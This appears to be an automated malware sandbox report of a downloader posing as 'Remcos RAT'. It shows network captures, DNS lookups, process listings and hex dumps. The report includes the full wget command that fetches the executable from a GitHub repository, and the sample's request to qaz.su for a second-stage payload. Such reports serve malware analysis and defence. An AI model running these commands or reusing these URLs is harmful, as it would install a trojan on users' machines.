                            Mar 20, 2025 17:02:22.186096907 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.187686920 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.187717915 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.401119947 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.401485920 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.403250933 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.403259039 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.403748035 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.405354023 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.448329926 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.678725004 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:22.733056068 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:23.103673935 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:23.103691101 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:23.103749037 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:23.103773117 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:23.103789091 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:23.103818893 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:23.103858948 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:23.110950947 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:23.110964060 CET44349722140.82.114.4192.168.2.5
                            Mar 20, 2025 17:02:23.232435942 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.232497931 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.232566118 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.234261990 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.234286070 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.439620972 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.439743042 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.441226959 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.441247940 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.441540956 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.442569017 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.488337994 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698784113 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698853016 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698884964 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698915958 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698916912 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.698949099 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.698970079 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.701786995 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.701837063 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.701843977 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.701854944 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:23.701905966 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.731925011 CET49723443192.168.2.5185.199.110.133
                            Mar 20, 2025 17:02:23.731945992 CET44349723185.199.110.133192.168.2.5
                            Mar 20, 2025 17:02:26.103060961 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.103105068 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:26.103219986 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.114451885 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.114468098 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:26.378484011 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:26.378613949 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.381849051 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.381861925 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:26.382270098 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:26.433661938 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:26.476341009 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.205471039 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.205554008 CET4434972480.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.205607891 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.213413000 CET49724443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.216473103 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.216526031 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.216608047 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.216833115 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.216851950 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.493330002 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:27.545579910 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.589234114 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:27.589251041 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:28.362086058 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:28.362118959 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:28.362142086 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:28.362227917 CET4434972580.87.203.251192.168.2.5
                            Mar 20, 2025 17:02:28.362238884 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:28.362281084 CET49725443192.168.2.580.87.203.251
                            Mar 20, 2025 17:02:28.370863914 CET49725443192.168.2.580.87.203.251
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 20, 2025 17:02:22.013801098 CET6384253192.168.2.51.1.1.1
                            Mar 20, 2025 17:02:22.158931971 CET53638421.1.1.1192.168.2.5
                            Mar 20, 2025 17:02:23.121454000 CET5235953192.168.2.51.1.1.1
                            Mar 20, 2025 17:02:23.228535891 CET53523591.1.1.1192.168.2.5
                            Mar 20, 2025 17:02:25.490021944 CET6077053192.168.2.51.1.1.1
                            Mar 20, 2025 17:02:26.097472906 CET53607701.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 20, 2025 17:02:22.013801098 CET192.168.2.51.1.1.10x5f16Standard query (0)github.comA (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:23.121454000 CET192.168.2.51.1.1.10x1f07Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:25.490021944 CET192.168.2.51.1.1.10xf56cStandard query (0)qaz.suA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 20, 2025 17:02:22.158931971 CET1.1.1.1192.168.2.50x5f16No error (0)github.com140.82.114.4A (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:23.228535891 CET1.1.1.1192.168.2.50x1f07No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:23.228535891 CET1.1.1.1192.168.2.50x1f07No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:23.228535891 CET1.1.1.1192.168.2.50x1f07No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:23.228535891 CET1.1.1.1192.168.2.50x1f07No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                            Mar 20, 2025 17:02:26.097472906 CET1.1.1.1192.168.2.50xf56cNo error (0)qaz.su80.87.203.251A (IP address)IN (0x0001)false
                            • github.com
                            • raw.githubusercontent.com
                            • qaz.su
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549722140.82.114.44438340C:\Windows\SysWOW64\wget.exe
                            TimestampBytes transferredDirectionData
                            2025-03-20 16:02:22 UTC252OUTGET /Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                            Accept: */*
                            Accept-Encoding: identity
                            Host: github.com
                            Connection: Keep-Alive
                            2025-03-20 16:02:22 UTC596INHTTP/1.1 302 Found
                            Server: GitHub.com
                            Date: Thu, 20 Mar 2025 16:02:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 0
                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                            Access-Control-Allow-Origin:
                            Location: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe
                            Cache-Control: no-cache
                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                            X-Frame-Options: deny
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 0
                            Referrer-Policy: no-referrer-when-downgrade
                            2025-03-20 16:02:23 UTC3368INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549723185.199.110.1334438340C:\Windows\SysWOW64\wget.exe
                            TimestampBytes transferredDirectionData
                            2025-03-20 16:02:23 UTC263OUTGET /Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                            Accept: */*
                            Accept-Encoding: identity
                            Host: raw.githubusercontent.com
                            Connection: Keep-Alive
                            2025-03-20 16:02:23 UTC894INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 7168
                            Cache-Control: max-age=300
                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                            Content-Type: application/octet-stream
                            ETag: "7fcb5d5ef33cfb9922653946fe94fb99fbbb91d07134a9ccbd4428edf6b3f15f"
                            Strict-Transport-Security: max-age=31536000
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: deny
                            X-XSS-Protection: 1; mode=block
                            X-GitHub-Request-Id: 67BC:23696F:1875CB5:1E56E08:67DC3C0E
                            Accept-Ranges: bytes
                            Date: Thu, 20 Mar 2025 16:02:23 GMT
                            Via: 1.1 varnish
                            X-Served-By: cache-lga21946-LGA
                            X-Cache: MISS
                            X-Cache-Hits: 0
                            X-Timer: S1742486544.579224,VS0,VE68
                            Vary: Authorization,Accept-Encoding,Origin
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Fastly-Request-ID: b54db5ac28fb8654f7b65f0bbd7324176d599c23
                            Expires: Thu, 20 Mar 2025 16:07:23 GMT
                            Source-Age: 0
                            2025-03-20 16:02:23 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 8d 16 fb 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 12 00 00 00 08 00 00 00 00 00 00 de 30 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL00 @@ `
                            2025-03-20 16:02:23 UTC1378INData Raw: 4d 03 06 00 dc 01 4d 03 06 00 a3 00 1b 03 0f 00 89 03 00 00 06 00 cb 00 d8 02 06 00 52 01 d8 02 06 00 33 01 d8 02 06 00 c3 01 d8 02 06 00 8f 01 d8 02 06 00 a8 01 d8 02 06 00 e2 00 d8 02 06 00 b7 00 2e 03 06 00 95 00 2e 03 06 00 16 01 d8 02 06 00 fd 00 30 02 06 00 e5 03 a4 02 0a 00 c4 03 1b 03 0e 00 f7 03 9d 03 06 00 4c 04 10 00 0a 00 04 04 ec 03 0e 00 ab 02 9d 03 0a 00 fe 02 7d 02 06 00 5e 04 35 00 06 00 48 00 1f 02 0e 00 36 04 9d 03 0e 00 b2 03 9d 03 0e 00 bd 02 9d 03 06 00 4a 02 a4 02 06 00 61 00 a4 02 06 00 68 04 10 00 0e 00 cc 02 9d 03 06 00 ea 02 35 00 0a 00 ff 02 7d 02 0e 00 93 02 9d 03 0e 00 53 00 9d 03 12 00 1a 02 5b 02 0e 00 9c 02 9d 03 00 00 00 00 2c 00 00 00 00 00 01 00 01 00 00 00 10 00 b0 02 b0 02 41 00 01 00 01 00 01 00 10 00 01 00 20 00 55
                            Data Ascii: MMR3..0L}^5H6Jah5}S[,A U
                            2025-03-20 16:02:23 UTC1378INData Raw: 6d 2e 44 72 61 77 69 6e 67 00 67 65 74 5f 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 43 6f 6e 74 61 69 6e 65 72 43 6f 6e 74 72 6f 6c 00 53 79 73 74 65 6d 00 46 6f 72 6d 00 71 54 72 6f 6a 61 6e 00 4d 61 69 6e 00 4d 65 73 73 61 67 65 42 6f 78 49 63 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 44 69 72 65 63 74 6f 72 79 49 6e 66 6f 00 53 6c 65 65 70 00 49 43 6f 6e 74 61 69 6e 65 72 00 43 75 72 72 65 6e 74 55 73 65 72 00 2e 63 74 6f 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d
                            Data Ascii: m.Drawingget_ExecutablePathSystem.ComponentModelContainerControlSystemFormqTrojanMainMessageBoxIconApplicationSystem.ReflectionDirectoryInfoSleepIContainerCurrentUser.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.Com
                            2025-03-20 16:02:23 UTC1378INData Raw: 78 63 65 70 74 69 6f 6e 54 68 72 6f 77 73 01 08 01 00 07 01 00 00 00 00 0d 01 00 08 53 79 73 74 65 6d 33 32 00 00 0e 01 00 09 4b 65 65 50 61 73 73 58 43 00 00 05 01 00 00 00 00 13 01 00 0e 4b 65 65 50 61 73 73 58 43 20 54 65 61 6d 00 00 10 01 00 0b 43 6f 6e 73 6f 6c 65 41 70 70 35 00 00 26 01 00 21 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 32 32 20 4b 65 65 50 61 73 73 58 43 20 54 65 61 6d 00 00 29 01 00 24 32 66 35 65 33 63 35 34 2d 37 31 35 37 2d 34 30 62 66 2d 38 61 35 37 2d 35 34 30 31 63 33 37 62 34 31 36 32 00 00 0c 01 00 07 32 2e 37 2e 31 2e 30 00 00 4d 01 00 1c 2e 4e 45 54 46 72 61 6d 65 77 6f 72 6b 2c 56 65 72 73 69 6f 6e 3d 76 34 2e 37 2e 32 01 00 54 0e 14 46 72 61 6d 65 77 6f 72 6b 44 69 73 70 6c 61 79 4e 61 6d 65 14 2e 4e 45 54 20 46 72
                            Data Ascii: xceptionThrowsSystem32KeePassXCKeePassXC TeamConsoleApp5&!Copyright (C) 2022 KeePassXC Team)$2f5e3c54-7157-40bf-8a57-5401c37b41622.7.1.0M.NETFramework,Version=v4.7.2TFrameworkDisplayName.NET Fr
                            2025-03-20 16:02:23 UTC1378INData Raw: 65 00 50 00 61 00 73 00 73 00 58 00 43 00 00 00 3e 00 0f 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4b 00 65 00 65 00 50 00 61 00 73 00 73 00 58 00 43 00 20 00 54 00 65 00 61 00 6d 00 00 00 00 00 3a 00 09 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 00 00 00 00 30 00 08 00 01 00 46 00 69 00 6c 00 65 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 32 00 2e 00 37 00 2e 00 31 00 2e 00 30 00 00 00 3a 00 0d 00 01 00 49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 2e 00 65 00 78 00 65 00 00 00 00 00 68 00 22 00 01 00 4c
                            Data Ascii: ePassXC>CompanyNameKeePassXC Team:FileDescriptionSystem320FileVersion2.7.1.0:InternalNameSystem32.exeh"L
                            2025-03-20 16:02:23 UTC278INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.54972480.87.203.2514438472C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            TimestampBytes transferredDirectionData
                            2025-03-20 16:02:26 UTC104OUTGET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1
                            Host: qaz.su
                            Connection: Keep-Alive
                            2025-03-20 16:02:27 UTC823INHTTP/1.1 302 Found
                            Server: ddos-guard
                            Connection: close
                            Set-Cookie: __ddg8_=Bgte63oUhvXtIswC; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg10_=1742486546; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg1_=Fl4UFRT3yyUv5CtIO4pr; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:26 GMT
                            Date: Thu, 20 Mar 2025 16:02:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 0
                            X-Powered-By: PHP/7.4.27
                            Set-Cookie: PHPSESSID=7o21doflef16pmr6tluq9euarp; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Location: https://qaz.su/index.php?a=download&q=file_not_exist


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.54972580.87.203.2514438472C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            TimestampBytes transferredDirectionData
                            2025-03-20 16:02:27 UTC69OUTGET /index.php?a=download&q=file_not_exist HTTP/1.1
                            Host: qaz.su
                            2025-03-20 16:02:28 UTC789INHTTP/1.1 404 Not Found
                            Server: ddos-guard
                            Connection: close
                            Set-Cookie: __ddg8_=O4wOpy74RXiJCDQ6; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg10_=1742486547; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg1_=hKS2vVwlRirc6uGFQrhA; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:27 GMT
                            Date: Thu, 20 Mar 2025 16:02:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 4365
                            Vary: Accept-Encoding
                            X-Powered-By: PHP/7.4.27
                            Set-Cookie: PHPSESSID=1etumsf5tr0a1ned2fo14bibpt; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            2025-03-20 16:02:28 UTC4365INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
                            Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


                            Click to jump to process

                            Click to jump to process

                            • File
                            • Registry
                            • Network

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1
                            Imagebase:0x220000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7e2000000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\wget.exe
                            Wow64 process (32bit):true
                            Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe"
                            Imagebase:0x400000
                            File size:3'895'184 bytes
                            MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:3
                            Start time:12:02:23
                            Start date:20/03/2025
                            Path:C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe"
                            Imagebase:0x900000
                            File size:7'168 bytes
                            MD5 hash:6166F997B4BB3428AE0D9D4B4E1F0DB2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 79%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            Target ID:6
                            Start time:12:02:27
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184
                            Imagebase:0x7b0000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000003.00000002.1400191414.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_f60000_Remcos-RAT-3.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71673c50c8008e2fabdde567f61670a1c0c9b660a804f72ea9f9efa5a35ebc54
                            • Instruction ID: 9c7f410e55efc661b3b9ce21cd9cbe63d9382b8a4aaac5dd169120988f93ffa2
                            • Opcode Fuzzy Hash: 71673c50c8008e2fabdde567f61670a1c0c9b660a804f72ea9f9efa5a35ebc54
                            • Instruction Fuzzy Hash: 78B1B274E01218CFDB68DFA6C854B9EBBB2BF89300F2084AAD409B7265DB745D85CF10
